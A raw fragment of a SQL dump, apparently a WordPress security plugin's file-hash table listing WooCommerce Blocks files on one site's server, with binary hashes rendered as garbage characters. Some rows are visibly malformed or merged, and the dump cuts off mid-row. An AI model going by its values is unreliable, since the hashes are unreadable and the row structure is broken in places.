xn','',0,'?'),('@^#C!4Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/contexts.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/contexts.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[gn]헎q.\'','nVM]b Hܬ O=\"','',0,'?'),('$z#pyi','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/currency.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/currency.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6zliP7h”','J(F lCIk~+(HontwYl(','',0,'?'),('lAˢJ|hU):','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/events.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/events.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\rVvwm','J܀{>9kG+','',0,'?'),('8j\rBU\rqf','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/hocs.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/hocs.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(o+WvL{`{','v(o@;YhN9Q ʞ9','',0,'?'),('~+~wv','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/hooks.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/hooks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\0E-\'','DSZV DŀŸ7Rqȟ','',0,'?'),('Hžj8md_0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/hooks.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/hooks.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%\r|H۔j@N#','(9^\0eH[AN!q','',0,'?'),('/7WE[@\0H1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/index.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/index.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B/\" z|p','&$\n=M)p\Z_Π5ۃJV','',0,'?'),('; |','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/notices.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/notices.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ru=y#\\PHo','+9&15`+zH !glpi~7Ė','',0,'?'),('7/%UA)\r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/objects.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/objects.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rlE >c','F\'qJԒu:T\r̿3{z','',0,'?'),('yZZnQxƂ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/payment-method-interface.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/payment-method-interface.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wwԙڳ)`','+>zSqs\r4,OMa*\rz','',0,'?'),('H^v*\rwc','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/payments.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/payments.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lx-\0y?A','ܘ.ؕ\\=hMf&{ߕ','',0,'?'),(';7 hDHP1(|nEr','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/settings.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-;j;',',(Kr])ֺJc~Ci$µ','',0,'?'),('%R]%E','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/shipping.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/shipping.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*4Rj#pA','0j^ҍL]4G|\Z)','',0,'?'),('f`٦Mnq+vR','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/shipping.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/shipping.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D$j-2*mh','0,#2-1Gx>R4@r:# xK','',0,'?'),('!*xFzK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/stock-status.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/stock-status.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','id _~j\nr','JdY [trYwRx','',0,'?'),('񴋇=he ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/taxes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/taxes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⑽{.A$9','t[AƆfHfJY%X5@','',0,'?'),('gɑ{\"Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/trim-html.d.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/trim-html.d.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',KĒI߷d','CxBhbE}e4qQq,%N','',0,'?'),('Ҟq[ ]LnW\n\\f','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/utils.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/utils.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mv*y45','Z`5#}\"O\nw7R\"Q;F','',0,'?'),('2\ZƷӶIٷF','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/validation.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-defs/validation.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p @0\\','T9\nSRĘ1™R','',0,'?'),('rweĥhSXN','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/address.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/address.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WyFl\r','THujުȠOL)C7','',0,'?'),('|P>tV-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/api-error-response.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/api-error-response.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(gm%','c1g4k#::Jj','',0,'?'),('/t%&p','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/attributes.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/attributes.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5(#_Ԧsɩ','BaXl\'9J0\\u|M +*','',0,'?'),(':]ay#sͅ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/boolean.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/boolean.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Io=T *JN','E1~~*ʧ+NV9v2 {','',0,'?'),('#(>8p]-O+','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/cart-response-totals.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/cart-response-totals.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`\'EV>n`*','jy&+O\ZfFllN','',0,'?'),('VSH!+^','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/empty.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/empty.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0p3Y(K)NY\\u','0l\"ejD(\0gЧL$(Č','',0,'?'),('jzЭ Xd\'\Zp','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/error.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/error.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+؀Lq5','?$kP{d q+.ZΩy','',0,'?'),('[Di@^U','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/function.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/function.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GN*Nt eɟ','4Ade^-e}| !c8z','',0,'?'),('$;\n@R4','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/index.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/index.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ີq0ZSMAɔf','Yk\r0ʛ%+ewMJ ','',0,'?'),('4۞њlOU10','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/null.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/null.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C4Rʦ\rf[;{z','9gt{9u\Zf2:Qhذl','',0,'?'),('>S!9+In\n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/number.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/number.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wLa','K-e i1ӸA;\r%}9}0b)I','',0,'?'),('&مniIj','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/object.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/object.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' u>dm7${','\\[u}nGq\Z9\nNEF','',0,'?'),('襎Q}Arw!0\0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/observers.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/observers.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3}f69\r6s)3','i@hW GŌKɰ_CQ\"x','',0,'?'),('QNvj^ 5','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/ratings.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/types/type-guards/ratings.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jʻ e6u0G','Ğ\n\Z}_{\0Joeb','',0,'?'),('<~l|','6 m\r\Z@XwVUS@}@hABj','',0,'?'),('I@sߤкO','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/is-widget-editor-page.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/is-widget-editor-page.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kW&GÃPs6\'Hu','2_YP^ x3vц','',0,'?'),('m*x׀','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/notices.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/notices.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yJDM|#5\\H5^','EoϘ!,sc F=no','',0,'?'),('Vӎ1c=LgV','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/object-operations.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/object-operations.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^d]9BEs!~','<`E&EG>,dq|4\nJ#KW+','',0,'?'),('yH1n2U/s','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/products.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/products.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Ϊ.[GWya2 ','8-fr?!)%r+M0{,i','',0,'?'),('X(b=c[zzA}','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/sanitize-html.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/sanitize-html.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq3{S*%Z','','@{]A,\',1!L3|ܮB9)','',0,'?'),('WS*TW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/filters.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/filters.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ࣻb ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/notices.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ir7!G','<(ǸwhbgszR͝`M{7','',0,'?'),('L ,BZ.E_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/products.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/products.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w_Y?~]y[V','[\0c1[\Zlt\rUv[  ','',0,'?'),('S{ꛠQ[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/trim-words.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/trim-words.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x_+.)5l','$d~)6JhV6O]h8 ','',0,'?'),('Mb','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/trim-words.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/trim-words.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U Pg~0˦','9+6V̤; T]zd\r','',0,'?'),('ީKA9(sz','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iDK|++}%!!','ί\r-X!{PutWb ','',0,'?'),('?Xf2N0NhT叀1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-frontend.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-frontend.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nm T\\f','4#i̽O;^^d','',0,'?'),('ɘ q=)','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4jZj!zV$','B6Xrunwmyu84.','',0,'?'),('nhr^iG','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Bw`(','{/yeB*C.i++$gg>n','',0,'?'),('nDAU{khq','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iN:Ӎ','4#LNAO:@+I\r','',0,'?'),(':`e<^0ڥ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-wrapper--mini-cart-contents-block/cart-button--mini-cart-contents-block/checkout-but--e791dc6c-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-wrapper--mini-cart-contents-block/cart-button--mini-cart-contents-block/checkout-but--e791dc6c-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A@X','9^\'/Kdfl\\M\\JS,>=}','',0,'?'),(';(pMg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-wrapper-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-wrapper-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.] 3YC \\','6 +ٴ}oUw','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-wrapper.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters-wrapper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_7<\rʩI#=','VIPf+$M) BDo9}\'H','',0,'?'),('_i\'iG2','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/active-filters.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݟ7sS \'XO','pn( Os=V\ny|J F~B\Z8','',0,'?'),('\ZyAg~B[0WL','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/add-to-cart-form/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/add-to-cart-form/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZN','jDBiTgfn\\MW~;G','',0,'?'),('G*0\\|Zrj','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/add-to-cart-form-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/add-to-cart-form-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_?,O|hm','۴uټk\0M|n p','',0,'?'),('x3Fwr','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products-frontend.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products-frontend.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rHʀ]͜ưP!','qI˼KsMm-VdSVf','',0,'?'),('\"+2~6^k~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','11}5d4','f<)0lRI*r \0Smڶ','',0,'?'),('vVDM:/p\\r~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4jeV1z̋','}8ue k+]r','',0,'?'),('K :_Yq','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZBS\0','vmnA6Q`\'~fXk\Z','',0,'?'),('AX萄X\n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')<ļ4A6','6Ȫ8s7z3uK\\=oR','',0,'?'),('=vmOs:j\r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԍ|0gy~|','3]T.WMJp|fK\0@E','',0,'?'),('x!/٠U <','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-products.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/RvZ(Bc ','*.2w\nthwq@|5G]tF','',0,'?'),('P`P;;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' /(ahcz%$w','\'b%-[&;\0iJ2Q#S~L','',0,'?'),('ׯSMr','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$}pQ҄M<*j','s+롢sr(̮E\nn/gX`','',0,'?'),('U\\`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gkaPT1}','i:G IoNCA`:','',0,'?'),('\nOr&|','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N#NB3/','n]_’ 6>TĺvrBʽ','',0,'?'),('ۖ2|:2','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/all-reviews.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z*35r[h!','\rW]6 2ǟ<_Xd9\0\"','',0,'?'),('#!{[]P','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nR϶ˍ\r\\','[f*r(ur_H7cj$D Mk','',0,'?'),('gODشe/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter-frontend.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter-frontend.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߶jd@OІ','7\\pذކ<','4!/*D.:ke\'\n%a\'Є','',0,'?'),('ʖ&\" ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter-wrapper-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter-wrapper-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'5\ZZ^n','ϼ\n |Vε]h.c','',0,'?'),('1 Gs1&8','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter-wrapper.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter-wrapper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Xֵ','w\'SVg0\rE 8Osnc','',0,'?'),('`e||谳','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#n9AWLJ','\';֌|6Kp\'ZYJrD\Zx','',0,'?'),('A Ey#Saۅg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ea[仟pe','[{qSE#B9)g2','',0,'?'),('>3[6&\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/attribute-filter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e&q\03DP','r PYgF0p~`ӪޒE\'kZ ʢ肭','',0,'?'),(' *dJ\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/blocks-checkout.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/blocks-checkout.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɭ򤨉4v','3ۀsom7K{HbeuҢ{','',0,'?'),('h\nfϖ&#','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/blocks-checkout.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/blocks-checkout.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' J\n.E*ڴf$','\Z]ydBBy0AF5c\Z','',0,'?'),(' Ӕ3FPn','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P x]>/Ӱ?qp','O0=!\0f-y}kЁl','',0,'?'),('x(V \\C|6','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','񯞞b','m{P6b2tTF\0:?REV6','',0,'?'),('r@W?T+3\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wTٌޤƲ@k','rQG\ZGd%c\'m潑ec$','',0,'?'),('N\0̦˺›k','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Jr`6g','γȕ[)K>@*O]C','',0,'?'),('\"xK- 擜','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/breadcrumbs.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G˳5_=','?\ZpV¿\09 